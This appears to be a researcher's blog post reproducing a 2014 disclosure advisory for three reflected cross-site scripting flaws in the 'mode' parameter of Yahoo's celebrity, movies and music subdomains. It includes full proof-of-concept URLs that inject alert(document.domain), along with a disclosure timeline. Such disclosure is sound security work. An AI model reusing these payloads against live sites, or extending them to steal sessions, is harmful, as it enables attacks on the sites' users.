Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities
In Jan ’14 I reported three Cross-site Scripting vulnerabilities to the Yahoo Bug Bounty Program. And I know, it is really really hard, but … again … no feedback or bounty :)
Screenshots:
XSS on ‘celebrity.yahoo.com‘
|
XSS on ‘movies.yahoo.com‘
|
XSS on ‘music.yahoo.com’
|
Here is the advisory:
Advisory:
|
Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities
|
Advisory ID:
|
SSCHADV2014-YahooBB-004 / YahooBB-005 / YahooBB-006
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on celebrity.yahoo.com, movies.yahoo.com, music.yahoo.com
|
Vendor URL:
|
|
Vendor Status:
|
Not tested anymore
|
Bounty:
|
nothing
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The ‘mode‘-Paramter on "https://celebrity.yahoo.com/", "https://movies.yahoo.com/", "https://music.yahoo.com/" is prone to a Cross-site Scripting vulnerability
======================
PoC-Exploit
======================
PoC-Exploit
======================
http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
|
http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
|
http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id= mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
|
======================
Disclosure Timeline
======================
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)
======================
Credits
======================
Vulnerabilities found and advisory written by Stefan Schurtz.
======================
References
======================
http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
Comments
Display comments as Linear | Threaded